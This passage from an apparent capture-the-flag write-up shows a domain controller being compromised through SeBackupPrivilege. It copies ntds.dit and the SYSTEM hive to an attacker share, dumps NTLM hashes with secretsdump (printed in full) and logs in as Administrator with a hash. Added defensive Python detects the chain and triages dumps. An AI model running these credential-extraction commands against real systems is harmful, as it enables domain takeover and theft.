------------------------------------------------------------------------------
1 z:\windows\ntds\
2022/04/23 06:56:40 ERROR 19 (0x00000013) Accessing Destination Directory Z:\
The media is write protected.
Waiting 30 seconds... Retrying...
2022/04/23 06:57:10 ERROR 19 (0x00000013) Accessing Destination Directory Z:\
The media is write protected.
Later I found this tool:
https://github.com/giuliano108/SeBackupPrivilege
It is a PowerShell-based tool for abusing SeBackupPrivilege. According to its documentation I need two DLLs, which I can upload through Evil-WinRM; the two files are in the /SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug directory:
-[~/…/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug]
└─$ ls
SeBackupPrivilegeCmdLets.dll SeBackupPrivilegeUtils.dll
$ cp * ~
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp>
Then import them into the current session:
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp>
Now I can copy ntds.dit to my local machine; the file may be large, so this can take a long time:
*Evil-WinRM* PS C:\temp> Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit
I also need the key that decrypts ntds.dit, which is in the HKLM\SYSTEM registry hive; this is slow too, but not as bad:
*Evil-WinRM* PS C:\temp> reg.exe save hklm\system \\10.10.16.12\share\system
The operation completed successfully.
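From the defender's side, the whole chain shown in this section leaves a recognisable trail in the Security log: a logon that receives SeBackupPrivilege (event 4672, "Special privileges assigned to new logon") for an account that is not an expected administrator, followed within minutes by diskshadow.exe, a copy of ntds.dit, or reg.exe saving the SYSTEM hive (event 4688, process creation with command-line auditing on). The following is an added example, not code from the original post or from any of the tools it uses, that correlates those two event types over a short window. The events are plain dicts in the shape you would get after parsing EVTX or a SIEM export to JSON; the field names PrivilegeList and CommandLine are the real 4672/4688 field names, the Account key is a simplified stand-in for SubjectDomainName\SubjectUserName, and the sample events, the allowlist and the 30-minute window are constructed assumptions.

```python
"""Correlate SeBackupPrivilege logons (4672) with follow-on process
creations (4688) that indicate shadow-copy credential extraction."""
from collections import defaultdict
from datetime import datetime, timedelta

# Privileges that let a logon read or write files regardless of their ACL.
WATCHED_PRIVILEGES = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Accounts expected to hold those privileges (constructed allowlist; in a real
# deployment this would be the documented backup/administration identities).
EXPECTED_HOLDERS = {"BLACKFIELD\\Administrator"}

# Command-line fragments that indicate hive or AD database extraction.
SUSPICIOUS_COMMANDS = (
    "diskshadow",
    "reg.exe save hklm\\system",
    "reg save hklm\\system",
    "ntds.dit",
    "ntdsutil",
)

WINDOW = timedelta(minutes=30)  # assumed correlation window


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def correlate(events):
    """Return a list of alert dicts (time, account, reason).

    A 4672 for a non-allowlisted account holding a watched privilege is
    alerted on its own and remembered; a 4688 from the same account whose
    command line matches SUSPICIOUS_COMMANDS within WINDOW of that logon is
    alerted as a follow-on step."""
    priv_logons = defaultdict(list)   # account -> times of watched-privilege logons
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        t, acct = _ts(ev["TimeCreated"]), ev["Account"]
        if ev["EventID"] == 4672:
            held = WATCHED_PRIVILEGES & set(ev.get("PrivilegeList", []))
            if held and acct not in EXPECTED_HOLDERS:
                priv_logons[acct].append(t)
                alerts.append({"time": ev["TimeCreated"], "account": acct,
                               "reason": f"unexpected holder of {sorted(held)}"})
        elif ev["EventID"] == 4688:
            cmd = ev.get("CommandLine", "").lower()
            if not any(s in cmd for s in SUSPICIOUS_COMMANDS):
                continue
            if any(timedelta(0) <= t - lt <= WINDOW for lt in priv_logons[acct]):
                alerts.append({"time": ev["TimeCreated"], "account": acct,
                               "reason": f"{cmd!r} within {WINDOW} of a SeBackupPrivilege logon"})
    return alerts


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4672, "TimeCreated": "2022-04-23T06:00:00", "Account": "BLACKFIELD\\Administrator",
     "PrivilegeList": ["SeBackupPrivilege", "SeRestorePrivilege", "SeDebugPrivilege"]},
    {"EventID": 4688, "TimeCreated": "2022-04-23T06:05:00", "Account": "BLACKFIELD\\Administrator",
     "CommandLine": "diskshadow /s nightly-backup.txt"},      # expected admin, no alert
    {"EventID": 4672, "TimeCreated": "2022-04-23T06:40:00", "Account": "BLACKFIELD\\svc_backup",
     "PrivilegeList": ["SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege"]},
    {"EventID": 4688, "TimeCreated": "2022-04-23T06:41:00", "Account": "BLACKFIELD\\svc_backup",
     "CommandLine": "whoami /priv"},                           # benign, ignored
    {"EventID": 4688, "TimeCreated": "2022-04-23T06:43:05", "Account": "BLACKFIELD\\svc_backup",
     "CommandLine": "diskshadow /s whoami.txt"},
    {"EventID": 4688, "TimeCreated": "2022-04-23T06:58:00", "Account": "BLACKFIELD\\svc_backup",
     "CommandLine": r"reg.exe save hklm\system \\10.10.16.12\share\system"},
    {"EventID": 4688, "TimeCreated": "2022-04-23T09:00:00", "Account": "BLACKFIELD\\svc_backup",
     "CommandLine": "diskshadow /s later.txt"},                # outside the window, no alert
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["time"], a["account"], a["reason"])
```

On the sample this yields three alerts for svc_backup (the privileged logon, diskshadow, and the SYSTEM hive save) and none for the allowlisted administrator or for the diskshadow run that falls outside the window. The allowlist is the part that matters in practice: Backup Operators membership and Remote Management Users membership on the same service account, as seen with net user above, is exactly the combination a reviewer of group membership should question.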
Then I can extract the hashes with Impacket's secretsdump:
$ ./toolbox/posttool/impacket-0.9.24/examples/secretsdump.py -system system -ntds ntds.dit LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
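Once an NTDS dump like the one above exists, whether produced by an attacker or by an incident response team verifying the auditors' advice in notes.txt, the first useful thing to do with it is a triage pass: which accounts have a blank password, which share the same NT hash, whether any legacy LM hashes survive, and which entries are the high-value built-in principals. The following is an added example (not from the original post or from Impacket) that parses secretsdump's domain\uid:rid:lmhash:nthash::: lines and produces that report. The empty-LM and empty-NT constants are the well-known hashes of "no LM hash stored" and of the empty string; all account lines and hash values in the sample are constructed and deliberately do not reproduce the real dump.

```python
"""Parse and triage a secretsdump-style NTDS dump."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "Guest", 502: "krbtgt"}

# domain prefix is optional: secretsdump prints it for some sources, not for others
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text: str):
    """Return one dict per credential line; status lines ([*], [-]) are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            entries.append(d)
    return entries


def triage(entries):
    """Flag blank passwords, surviving LM hashes, machine accounts,
    well-known RIDs and NT hashes shared by more than one account."""
    by_nt = defaultdict(list)
    report = {"blank_password": [], "lm_hash_present": [], "machine_accounts": [],
              "well_known": {}, "shared_nt": {}}
    for e in entries:
        u = e["user"]
        if e["nt"] == EMPTY_NT:
            report["blank_password"].append(u)
        if e["lm"] != EMPTY_LM:
            report["lm_hash_present"].append(u)
        if u.endswith("$"):
            report["machine_accounts"].append(u)
        if e["rid"] in WELL_KNOWN_RIDS:
            report["well_known"][u] = WELL_KNOWN_RIDS[e["rid"]]
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(u)
    # identical NT hash means identical password: reuse across accounts
    report["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return report


# Constructed hash values (obviously fake, valid hex so the regex accepts them).
H_ADMIN, H_DC, H_KRB, H_SHARED, H_LEGACY, LM_LEGACY = (
    "a" * 32, "b" * 32, "c" * 32, "d" * 32, "e" * 32, "f" * 32)

# Constructed sample dump in secretsdump's output format.
SAMPLE_DUMP = f"""[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:{EMPTY_LM}:{H_ADMIN}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
DC01$:1000:{EMPTY_LM}:{H_DC}:::
krbtgt:502:{EMPTY_LM}:{H_KRB}:::
audit2020:1103:{EMPTY_LM}:{H_SHARED}:::
support:1104:{EMPTY_LM}:{H_SHARED}:::
EXAMPLE.local\\legacy:1105:{LM_LEGACY}:{H_LEGACY}:::
"""

if __name__ == "__main__":
    for key, value in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

In the sample the Guest entry is the blank-password case (the same empty-NT value that appears for Guest in the real dump above), audit2020 and support share a password, and the legacy account still carries an LM hash, which is a configuration finding in its own right on a modern domain.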
Getting root.txt:
Now I can either pass-the-hash onto the target or connect with evil-winrm using the hash; I chose the latter, because the note said root.txt was encrypted, and evil-winrm is better if file operations are involved. But I think I was tricked, because root.txt is not encrypted at all:
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
Or perhaps another player got there first, since I found traces they left behind:
*Evil-WinRM* PS C:\temp> net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable H: \\10.10.14.4\blackfieldA Microsoft Windows Network
The command completed successfully.
*Evil-WinRM* PS C:\temp>